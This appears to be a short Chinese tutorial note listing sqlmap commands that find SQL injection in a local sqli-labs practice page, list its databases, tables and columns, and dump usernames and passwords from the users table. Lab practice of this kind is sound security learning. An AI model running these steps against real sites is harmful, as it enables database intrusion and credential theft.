sqlmap 扫描注入漏洞
1 1、检测是否存在漏洞: 2 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 3 2、获取数据库信息: 4 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 --dbs 5 3、数据库表信息: 6 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security --tables 7 4、表中字段信息 8 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns 9 5、字段值数据 10 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump
耐得住寂寞,才能登得顶
Gitee码云:https://gitee.com/lyc96/projects